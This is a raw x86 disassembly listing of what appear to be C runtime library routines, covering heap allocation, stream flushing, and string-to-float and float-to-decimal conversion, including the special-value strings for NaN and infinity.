xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_4196BB
cmp ebx, ds:dword_42E3AC
ja short loc_4196A6
push ebx
call sub_4138A6
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4196D1
loc_4196A6: ; CODE XREF: sub_41966A+2D�j
push esi
push 8
push ds:dword_460EA0
call ds:dword_41C134 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_4196DD
loc_4196BB: ; CODE XREF: sub_41966A+25�j
cmp ds:dword_45F89C, 0
jz short loc_4196DD
push esi
call sub_4134BB
test eax, eax
pop ecx
jz short loc_4196E3
jmp short loc_41968A
; ---------------------------------------------------------------------------
loc_4196D1: ; CODE XREF: sub_41966A+3A�j
push ebx
push 0
push edi
call sub_410590
add esp, 0Ch
loc_4196DD: ; CODE XREF: sub_41966A+4F�j
; sub_41966A+58�j
mov eax, edi
loc_4196DF: ; CODE XREF: sub_41966A+7B�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4196E3: ; CODE XREF: sub_41966A+63�j
xor eax, eax
jmp short loc_4196DF
sub_41966A endp
; ---------------------------------------------------------------------------
loc_4196E7: ; CODE XREF: seg000:00418076�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp ds:dword_460B40, esi
jle short loc_41973A
loc_4196F6: ; CODE XREF: seg000:00419738�j
mov eax, ds:dword_45FB34
mov eax, [eax+esi*4]
test eax, eax
jz short loc_419731
test byte ptr [eax+0Ch], 83h
jz short loc_419715
push eax
call sub_4119F0
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_419715
inc edi
loc_419715: ; CODE XREF: seg000:00419706�j
; seg000:00419712�j
cmp esi, 14h
jl short loc_419731
mov eax, ds:dword_45FB34
push dword ptr [eax+esi*4]
call sub_410C83
mov eax, ds:dword_45FB34
pop ecx
and dword ptr [eax+esi*4], 0
loc_419731: ; CODE XREF: seg000:00419700�j
; seg000:00419718�j
inc esi
cmp esi, ds:dword_460B40
jl short loc_4196F6
loc_41973A: ; CODE XREF: seg000:004196F4�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_41973F proc near ; CODE XREF: sub_4183DF+2B�p
; sub_4183DF+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_419755
cmp ecx, esi
jnb short loc_419758
loc_419755: ; CODE XREF: sub_41973F+10�j
push 1
pop eax
loc_419758: ; CODE XREF: sub_41973F+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_41973F endp
; =============== S U B R O U T I N E =======================================
sub_419760 proc near ; CODE XREF: sub_419819+40�p
; sub_419819+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_41973F
add esp, 0Ch
test eax, eax
jz short loc_419792
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_41973F
add esp, 0Ch
test eax, eax
jz short loc_419792
inc dword ptr [esi+8]
loc_419792: ; CODE XREF: sub_419760+19�j
; sub_419760+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_41973F
add esp, 0Ch
test eax, eax
jz short loc_4197AA
inc dword ptr [esi+8]
loc_4197AA: ; CODE XREF: sub_419760+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_41973F
add esp, 0Ch
pop edi
pop esi
retn
sub_419760 endp
; =============== S U B R O U T I N E =======================================
sub_4197BE proc near ; CODE XREF: sub_419819+30�p
; sub_419819+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_4197BE endp
; =============== S U B R O U T I N E =======================================
sub_4197EC proc near ; CODE XREF: sub_419DB1+1C8�p
; sub_41A379+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_4197EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419819 proc near ; CODE XREF: sub_4198E0+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_41988D
push edi
mov [ebp+arg_8], eax
loc_419840: ; CODE XREF: sub_419819+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_4197BE
push ebx
call sub_4197BE
lea eax, [ebp+var_10]
push eax
push ebx
call sub_419760
push ebx
call sub_4197BE
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_419760
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_419840
xor edx, edx
pop edi
loc_41988D: ; CODE XREF: sub_419819+21�j
; sub_419819+9F�j
cmp [ebx+8], edx
jnz short loc_4198BA
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_41988D
; ---------------------------------------------------------------------------
loc_4198BA: ; CODE XREF: sub_419819+77�j
mov esi, 8000h
loc_4198BF: ; CODE XREF: sub_419819+B9�j
test [ebx+8], esi
jnz short loc_4198D4
push ebx
call sub_4197BE
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_4198BF
; ---------------------------------------------------------------------------
loc_4198D4: ; CODE XREF: sub_419819+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_419819 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198E0 proc near ; CODE XREF: sub_418728+17�p
; sub_418755+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_41991B: ; CODE XREF: sub_4198E0+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_419931
cmp cl, 9
jz short loc_419931
cmp cl, 0Ah
jz short loc_419931
cmp cl, 0Dh
jnz short loc_419934
loc_419931: ; CODE XREF: sub_4198E0+40�j
; sub_4198E0+45�j ...
inc edi
jmp short loc_41991B
; ---------------------------------------------------------------------------
loc_419934: ; CODE XREF: sub_4198E0+4F�j
push 4
pop esi
loc_419937: ; CODE XREF: sub_4198E0+AE�j
; sub_4198E0+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_419BBA ; default
; jumptable 00419943 case 10
jmp ds:off_419D81[eax*4] ; switch jump
loc_41994A: ; DATA XREF: seg000:off_419D81�o
cmp bl, 31h ; jumptable 00419943 case 0
jl short loc_41995B
cmp bl, 39h
jg short loc_41995B
loc_419954: ; CODE XREF: sub_4198E0+C4�j
; sub_4198E0+118�j
push 3
jmp loc_419B78
; ---------------------------------------------------------------------------
loc_41995B: ; CODE XREF: sub_4198E0+6D�j
; sub_4198E0+72�j
cmp bl, ds:byte_42E3A0
jnz short loc_41996A
loc_419963: ; CODE XREF: sub_4198E0+124�j
push 5
jmp loc_419BB0
; ---------------------------------------------------------------------------
loc_41996A: ; CODE XREF: sub_4198E0+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_419990
dec eax
dec eax
jz short loc_419984
sub eax, 3
jnz loc_419C53
jmp loc_419A13
; ---------------------------------------------------------------------------
loc_419984: ; CODE XREF: sub_4198E0+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_419937
; ---------------------------------------------------------------------------
loc_419990: ; CODE XREF: sub_4198E0+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_419937
; ---------------------------------------------------------------------------
loc_419999: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
cmp bl, 31h ; jumptable 00419943 case 1
mov [ebp+var_10], edx
jl short loc_4199A6
cmp bl, 39h
jle short loc_419954
loc_4199A6: ; CODE XREF: sub_4198E0+BF�j
cmp bl, ds:byte_42E3A0
jz loc_419A6E
cmp bl, 2Bh
jz short loc_4199E8
cmp bl, 2Dh
jz short loc_4199E8
cmp bl, 30h
jz short loc_419A13
loc_4199C1: ; CODE XREF: sub_4198E0+207�j
cmp bl, 43h
jle loc_419C53
cmp bl, 45h
jle short loc_4199E1
cmp bl, 63h
jle loc_419C53
cmp bl, 65h
jg loc_419C53
loc_4199E1: ; CODE XREF: sub_4198E0+ED�j
push 6
jmp loc_419BB0
; ---------------------------------------------------------------------------
loc_4199E8: ; CODE XREF: sub_4198E0+D5�j
; sub_4198E0+DA�j ...
dec edi
push 0Bh
jmp loc_419BB0
; ---------------------------------------------------------------------------
loc_4199F0: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
cmp bl, 31h ; jumptable 00419943 case 2
jl short loc_4199FE
cmp bl, 39h
jle loc_419954
loc_4199FE: ; CODE XREF: sub_4198E0+113�j
cmp bl, ds:byte_42E3A0
jz loc_419963
cmp bl, 30h
jnz loc_419BC8
loc_419A13: ; CODE XREF: sub_4198E0+9F�j
; sub_4198E0+DF�j
mov eax, edx
jmp loc_419937
; ---------------------------------------------------------------------------
loc_419A1A: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
mov [ebp+var_10], edx ; jumptable 00419943 case 3
loc_419A1D: ; CODE XREF: sub_4198E0+184�j
cmp ds:dword_42E39C, edx
jle short loc_419A36
movzx eax, bl
push esi
push eax
call sub_413446
pop ecx
pop ecx
push 1
pop edx
jmp short loc_419A44
; ---------------------------------------------------------------------------
loc_419A36: ; CODE XREF: sub_4198E0+143�j
mov ecx, ds:dword_42E190
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_419A44: ; CODE XREF: sub_4198E0+154�j
test eax, eax
jz short loc_419A66
cmp [ebp+var_4], 19h
jnb short loc_419A5E
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_419A61
; ---------------------------------------------------------------------------
loc_419A5E: ; CODE XREF: sub_4198E0+16C�j
inc [ebp+var_8]
loc_419A61: ; CODE XREF: sub_4198E0+17C�j
mov bl, [edi]
inc edi
jmp short loc_419A1D
; ---------------------------------------------------------------------------
loc_419A66: ; CODE XREF: sub_4198E0+166�j
cmp bl, ds:byte_42E3A0
jnz short loc_419AD5
loc_419A6E: ; CODE XREF: sub_4198E0+CC�j
mov eax, esi
jmp loc_419937
; ---------------------------------------------------------------------------
loc_419A75: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
cmp [ebp+var_4], 0 ; jumptable 00419943 case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_419A8E
loc_419A81: ; CODE XREF: sub_4198E0+1AC�j
cmp bl, 30h
jnz short loc_419A8E
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_419A81
; ---------------------------------------------------------------------------
loc_419A8E: ; CODE XREF: sub_4198E0+19F�j
; sub_4198E0+1A4�j ...
cmp ds:dword_42E39C, edx
jle short loc_419AA7
movzx eax, bl
push esi
push eax
call sub_413446
pop ecx
pop ecx
push 1
pop edx
jmp short loc_419AB5
; ---------------------------------------------------------------------------
loc_419AA7: ; CODE XREF: sub_4198E0+1B4�j
mov ecx, ds:dword_42E190
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_419AB5: ; CODE XREF: sub_4198E0+1C5�j
test eax, eax
jz short loc_419AD5
cmp [ebp+var_4], 19h
jnb short loc_419AD0
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_419AD0: ; CODE XREF: sub_4198E0+1DD�j
mov bl, [edi]
inc edi
jmp short loc_419A8E
; ---------------------------------------------------------------------------
loc_419AD5: ; CODE XREF: sub_4198E0+18C�j
; sub_4198E0+1D7�j
cmp bl, 2Bh
jz loc_4199E8
cmp bl, 2Dh
jz loc_4199E8
jmp loc_4199C1
; ---------------------------------------------------------------------------
loc_419AEC: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
cmp ds:dword_42E39C, edx ; jumptable 00419943 case 5
mov [ebp+var_24], edx
jle short loc_419B08
movzx eax, bl
push esi
push eax
call sub_413446
pop ecx
pop ecx
push 1
pop edx
jmp short loc_419B16
; ---------------------------------------------------------------------------
loc_419B08: ; CODE XREF: sub_4198E0+215�j
mov ecx, ds:dword_42E190
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_419B16: ; CODE XREF: sub_4198E0+226�j
test eax, eax
jz loc_419BC8
mov eax, esi
jmp short loc_419B79
; ---------------------------------------------------------------------------
loc_419B22: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
lea ecx, [edi-2] ; jumptable 00419943 case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_419B32
cmp bl, 39h
jle short loc_419B76
loc_419B32: ; CODE XREF: sub_4198E0+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_419BAE
dec eax
dec eax
jz short loc_419BA2
sub eax, 3
jnz loc_419C56
loc_419B47: ; CODE XREF: sub_4198E0+2A4�j
push 8
jmp short loc_419BB0
; ---------------------------------------------------------------------------
loc_419B4B: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
mov [ebp+var_20], edx ; jumptable 00419943 case 8
loc_419B4E: ; CODE XREF: sub_4198E0+276�j
cmp bl, 30h
jnz short loc_419B58
mov bl, [edi]
inc edi
jmp short loc_419B4E
; ---------------------------------------------------------------------------
loc_419B58: ; CODE XREF: sub_4198E0+271�j
cmp bl, 31h
jl loc_419C53
cmp bl, 39h
jg loc_419C53
jmp short loc_419B76
; ---------------------------------------------------------------------------
loc_419B6C: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
cmp bl, 31h ; jumptable 00419943 case 7
jl short loc_419B7F
cmp bl, 39h
jg short loc_419B7F
loc_419B76: ; CODE XREF: sub_4198E0+250�j
; sub_4198E0+28A�j
push 9
loc_419B78: ; CODE XREF: sub_4198E0+76�j
pop eax
loc_419B79: ; CODE XREF: sub_4198E0+240�j
dec edi
jmp loc_419937
; ---------------------------------------------------------------------------
loc_419B7F: ; CODE XREF: sub_4198E0+28F�j
; sub_4198E0+294�j
cmp bl, 30h
jnz short loc_419BC8
jmp short loc_419B47
; ---------------------------------------------------------------------------
loc_419B86: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
cmp [ebp+arg_18], 0 ; jumptable 00419943 case 11
jz short loc_419BB6
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_419BAE
dec eax
dec eax
jnz loc_419C56
loc_419BA2: ; CODE XREF: sub_4198E0+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_419937
; ---------------------------------------------------------------------------
loc_419BAE: ; CODE XREF: sub_4198E0+258�j
; sub_4198E0+2B8�j
push 7
loc_419BB0: ; CODE XREF: sub_4198E0+85�j
; sub_4198E0+103�j ...
pop eax
jmp loc_419937
; ---------------------------------------------------------------------------
loc_419BB6: ; CODE XREF: sub_4198E0+2AA�j
push 0Ah
dec edi
pop eax
loc_419BBA: ; CODE XREF: sub_4198E0+5D�j
; sub_4198E0+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00419943 case 10
jz loc_419C58
jmp loc_419937
; ---------------------------------------------------------------------------
loc_419BC8: ; CODE XREF: sub_4198E0+12D�j
; sub_4198E0+238�j ...
mov edi, [ebp+arg_8]
jmp loc_419C58
; ---------------------------------------------------------------------------
loc_419BD0: ; CODE XREF: sub_4198E0+63�j
; DATA XREF: seg000:off_419D81�o
mov [ebp+var_20], 1 ; jumptable 00419943 case 9
xor esi, esi
loc_419BD9: ; CODE XREF: sub_4198E0+339�j
cmp ds:dword_42E39C, 1
jle short loc_419BF1
movzx eax, bl
push 4
push eax
call sub_413446
pop ecx
pop ecx
jmp short loc_419C00
; ---------------------------------------------------------------------------
loc_419BF1: ; CODE XREF: sub_4198E0+300�j
mov ecx, ds:dword_42E190
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_419C00: ; CODE XREF: sub_4198E0+30F�j
test eax, eax
jz short loc_419C20
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_419C1B
mov bl, [edi]
inc edi
jmp short loc_419BD9
; ---------------------------------------------------------------------------
loc_419C1B: ; CODE XREF: sub_4198E0+334�j
mov esi, 1451h
loc_419C20: ; CODE XREF: sub_4198E0+322�j
mov [ebp+var_1C], esi
loc_419C23: ; CODE XREF: sub_4198E0+371�j
cmp ds:dword_42E39C, 1
jle short loc_419C3B
movzx eax, bl
push 4
push eax
call sub_413446
pop ecx
pop ecx
jmp short loc_419C4A
; ---------------------------------------------------------------------------
loc_419C3B: ; CODE XREF: sub_4198E0+34A�j
mov ecx, ds:dword_42E190
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_419C4A: ; CODE XREF: sub_4198E0+359�j
test eax, eax
jz short loc_419C53
mov bl, [edi]
inc edi
jmp short loc_419C23
; ---------------------------------------------------------------------------
loc_419C53: ; CODE XREF: sub_4198E0+99�j
; sub_4198E0+E4�j ...
dec edi
jmp short loc_419C58
; ---------------------------------------------------------------------------
loc_419C56: ; CODE XREF: sub_4198E0+261�j
; sub_4198E0+2BC�j
mov edi, ecx
loc_419C58: ; CODE XREF: sub_4198E0+2DD�j
; sub_4198E0+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_419D40
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_419C84
cmp [ebp+var_45], 5
jl short loc_419C78
inc [ebp+var_45]
loc_419C78: ; CODE XREF: sub_4198E0+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_419C87
; ---------------------------------------------------------------------------
loc_419C84: ; CODE XREF: sub_4198E0+38D�j
mov eax, [ebp+var_C]
loc_419C87: ; CODE XREF: sub_4198E0+3A2�j
cmp [ebp+var_4], 0
jbe loc_419D36
loc_419C91: ; CODE XREF: sub_4198E0+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_419C9F
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_419C91
; ---------------------------------------------------------------------------
loc_419C9F: ; CODE XREF: sub_4198E0+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_419819
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_419CBE
neg eax
loc_419CBE: ; CODE XREF: sub_4198E0+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_419CC9
add eax, [ebp+arg_10]
loc_419CC9: ; CODE XREF: sub_4198E0+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_419CD1
sub eax, [ebp+arg_14]
loc_419CD1: ; CODE XREF: sub_4198E0+3EC�j
cmp eax, 1450h
jle short loc_419D08
mov [ebp+var_2C], 1
loc_419CDF: ; CODE XREF: sub_4198E0+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_419CEB: ; CODE XREF: sub_4198E0+454�j
; sub_4198E0+45E�j
cmp [ebp+var_2C], 0
jz short loc_419D51
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_419D66
; ---------------------------------------------------------------------------
loc_419D08: ; CODE XREF: sub_4198E0+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_419D18
mov [ebp+var_30], 1
jmp short loc_419CDF
; ---------------------------------------------------------------------------
loc_419D18: ; CODE XREF: sub_4198E0+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_41A599
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_419CEB
; ---------------------------------------------------------------------------
loc_419D36: ; CODE XREF: sub_4198E0+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_419CEB
; ---------------------------------------------------------------------------
loc_419D40: ; CODE XREF: sub_4198E0+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_419D66
; ---------------------------------------------------------------------------
loc_419D51: ; CODE XREF: sub_4198E0+40F�j
cmp [ebp+var_30], 0
jz short loc_419D66
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_419D66: ; CODE XREF: sub_4198E0+426�j
; sub_4198E0+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_4198E0 endp
; ---------------------------------------------------------------------------
off_419D81 dd offset loc_41994A ; DATA XREF: sub_4198E0+63�r
dd offset loc_419999 ; jump table for switch statement
dd offset loc_4199F0
dd offset loc_419A1A
dd offset loc_419A75
dd offset loc_419AEC
dd offset loc_419B22
dd offset loc_419B6C
dd offset loc_419B4B
dd offset loc_419BD0
dd offset loc_419BBA
dd offset loc_419B86
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419DB1 proc near ; CODE XREF: sub_4187F9+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_419E13
mov byte ptr [ebx+2], 2Dh
jmp short loc_419E17
; ---------------------------------------------------------------------------
loc_419E13: ; CODE XREF: sub_419DB1+5A�j
mov byte ptr [ebx+2], 20h
loc_419E17: ; CODE XREF: sub_419DB1+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_419E3D
test edi, edi
jnz short loc_419E3D
cmp [ebp+arg_0], edi
jnz short loc_419E3D
loc_419E28: ; CODE XREF: sub_419DB1+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_41A03B
; ---------------------------------------------------------------------------
loc_419E3D: ; CODE XREF: sub_419DB1+6C�j
; sub_419DB1+70�j ...
cmp dx, si
jnz short loc_419EBC
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_419E56
cmp [ebp+arg_0], 0
jz short loc_419E65
loc_419E56: ; CODE XREF: sub_419DB1+9D�j
test edi, 40000000h
jnz short loc_419E65
push offset a1Snan ; "1#SNAN"
jmp short loc_419EAB
; ---------------------------------------------------------------------------
loc_419E65: ; CODE XREF: sub_419DB1+A3�j
; sub_419DB1+AB�j
test cx, cx
jz short loc_419E7F
cmp edi, 0C0000000h
jnz short loc_419E7F
cmp [ebp+arg_0], 0
jnz short loc_419EA6
push offset a1Ind ; "1#IND"
jmp short loc_419E8E
; ---------------------------------------------------------------------------
loc_419E7F: ; CODE XREF: sub_419DB1+B7�j
; sub_419DB1+BF�j
cmp edi, eax
jnz short loc_419EA6
cmp [ebp+arg_0], 0
jnz short loc_419EA6
push offset a1Inf ; "1#INF"
loc_419E8E: ; CODE XREF: sub_419DB1+CC�j
lea eax, [ebx+4]
push eax
call sub_411B70
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_419E9D: ; CODE XREF: sub_419DB1+109�j
and [ebp+var_4], 0
jmp loc_41A014
; ---------------------------------------------------------------------------
loc_419EA6: ; CODE XREF: sub_419DB1+C5�j
; sub_419DB1+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_419EAB: ; CODE XREF: sub_419DB1+B2�j
lea eax, [ebx+4]
push eax
call sub_411B70
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_419E9D
; ---------------------------------------------------------------------------
loc_419EBC: ; CODE XREF: sub_419DB1+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_41A599
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_419F1D
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_41A379
pop ecx
pop ecx
loc_419F1D: ; CODE XREF: sub_419DB1+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_419F37
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_419F3A
jmp loc_419E28
; ---------------------------------------------------------------------------
loc_419F37: ; CODE XREF: sub_419DB1+173�j
mov edi, [ebp+arg_C]
loc_419F3A: ; CODE XREF: sub_419DB1+17F�j
cmp edi, 15h
jle short loc_419F42
push 15h
pop edi
loc_419F42: ; CODE XREF: sub_419DB1+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_419F58: ; CODE XREF: sub_419DB1+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_4197BE
dec [ebp+arg_14]
pop ecx
jnz short loc_419F58
test esi, esi
jge short loc_419F82
neg esi
and esi, 0FFh
jle short loc_419F82
loc_419F75: ; CODE XREF: sub_419DB1+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_4197EC
dec esi
pop ecx
jnz short loc_419F75
